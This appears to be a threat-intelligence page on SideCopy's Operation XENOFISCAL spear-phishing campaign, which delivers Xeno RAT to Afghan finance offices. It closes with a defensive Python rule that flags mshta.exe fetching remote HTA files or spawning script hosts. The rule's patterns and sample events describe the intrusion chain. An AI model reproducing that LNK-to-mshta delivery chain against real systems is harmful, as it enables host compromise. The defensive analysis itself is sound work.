
SideCopy Operation XENOFISCAL spear-phishing campaign targeting Afghan finance entities

Campaign
First reported
Last updated
Happening score (H score): 25
1 unique source, 1 article

Summary


The SideCopy-linked Operation XENOFISCAL spear-phishing campaign is targeting Afghanistan's Ministry of Finance and related provincial finance offices with Xeno RAT, raising the risk of host compromise across government systems. Delivery uses a ZIP archive with a malicious LNK file and a Pashto-language lure, then chains mshta.exe into an HTA fetch and in-memory JavaScript execution. The operation extends to provincial revenue and finance directorates, Pashto-speaking government officials, and provincial-level employees, showing a focused government-targeting effort.

Related Happenings

Transparent Tribe AI-assisted implant campaign targeting India

Campaign
First: 06.03.2026 17:11 Last: 06.03.2026 17:11 Sources 1

About this happening: **Transparent Tribe (APT36)** is using **AI-powered coding tools** to mass-produce disposable implants in an active **campaign** targeting the **Indian government**, its embassies...

APT36 / SideCopy phishing-led campaign targeting Indian defense organizations

Campaign
First: 11.02.2026 16:52 Last: 11.02.2026 16:52 Sources 1

About this happening: A **phishing-led** **APT36 / SideCopy** campaign is targeting **Indian defense and government-aligned organizations**, using cross-platform **RATs** to steal sensitive data and ke...

Bloody Wolf / Stan Ghouls NetSupport RAT spear-phishing campaign

Campaign
First: 09.02.2026 12:58 Last: 09.02.2026 12:58 Sources 1

About this happening: The **Bloody Wolf / Stan Ghouls** operation is actively running a **spear-phishing campaign** against **Uzbekistan and Russia**, and the activity matters because it is delivering...

Phantom Stealer phishing delivery and exfiltration activity

Malware Activity
First: 15.12.2025 18:00 Last: 15.12.2025 18:00 Sources 1

About this happening: **Phantom Stealer** is being delivered through a **phishing campaign** that uses a **ZIP-to-ISO attachment chain** to bypass mail defenses, exposing **Russian-speaking organizatio...

Operation MoneyMount-ISO Phantom Stealer phishing campaign targeting Russian finance entities

Campaign
First: 15.12.2025 11:24 Last: 15.12.2025 11:24 Sources 1

About this happening: The **Operation MoneyMount-ISO** phishing campaign is actively targeting organizations in **Russia**, and it matters because the emails deliver **Phantom Stealer** through **malic...

Timeline

  1. 02.06.2026 12:05 2 articles · 2h ago

    SideCopy Operation XENOFISCAL targets Afghanistan's Ministry of Finance with Xeno RAT

    Initial Disclosure

    SideCopy's Operation XENOFISCAL targets Afghanistan's Ministry of Finance, related provincial revenue and finance directorates, Pashto-speaking government officials, and provincial-level government employees with Xeno RAT. The lure uses a ZIP archive containing a malicious LNK file with a Pashto-language filename, and execution chains mshta.exe to fetch an HTA from a compromised Afghan education domain, run obfuscated JavaScript in memory, and deploy Xeno RAT 1.8.7 with Registry-based persistence and a decoy document.
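Detection logic for the LNK-to-mshta.exe step of the chain described above, added here as an example and not taken from the original report or its sources: it flags process-creation events where mshta.exe is handed a remote URL or inline script, and script hosts started by mshta.exe. The field names follow Sysmon Event ID 1; the sample events, host name, paths and PIDs are constructed, and the list of suspect child processes is an assumption to tune per environment.

```python
import re

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
INLINE_RE = re.compile(r"\b(?:javascript|vbscript):", re.IGNORECASE)
SHELL_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe"}
# Assumption: child processes of mshta.exe worth flagging; tune per environment.
SUSPECT_CHILDREN = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe"}

def basename(path):
    """Lower-cased file name from a Windows or POSIX style path."""
    return re.split(r"[\\/]", path or "")[-1].lower()

def score_event(ev):
    """Return the reasons a process-creation event matches the chain (empty if none)."""
    image, parent = basename(ev.get("Image")), basename(ev.get("ParentImage"))
    cmd = ev.get("CommandLine") or ""
    reasons = []
    if image == "mshta.exe":
        if URL_RE.search(cmd):
            reasons.append("mshta.exe given a remote URL")
        if INLINE_RE.search(cmd):
            reasons.append("mshta.exe given inline script")
        # A shortcut opened by the user runs its target under explorer.exe.
        if reasons and parent in SHELL_PARENTS:
            reasons.append("started by " + parent)
    elif parent == "mshta.exe" and image in SUSPECT_CHILDREN:
        reasons.append("mshta.exe spawned " + image)
    return reasons

def triage(events):
    """Return (ProcessId, reasons) for every event with at least one reason."""
    return [(ev["ProcessId"], r) for ev in events if (r := score_event(ev))]

# Constructed sample events; host, paths and PIDs are placeholders.
SAMPLE_EVENTS = [
    {"ProcessId": 4112, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" https://files.example.invalid/lure.hta'},
    {"ProcessId": 4390, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe", "CommandLine": "powershell.exe -nop"},
    {"ProcessId": 5120, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'mshta.exe "C:\Program Files\Vendor\help.hta"'},
    {"ProcessId": 5200, "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "notepad.exe"},
]

if __name__ == "__main__":
    for pid, reasons in triage(SAMPLE_EVENTS):
        print(pid, "; ".join(reasons))
```

The locally stored HTA (PID 5120) is deliberately not flagged, so the rule stays quiet on legitimate HTA-based help or installer pages while still catching the remote fetch.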
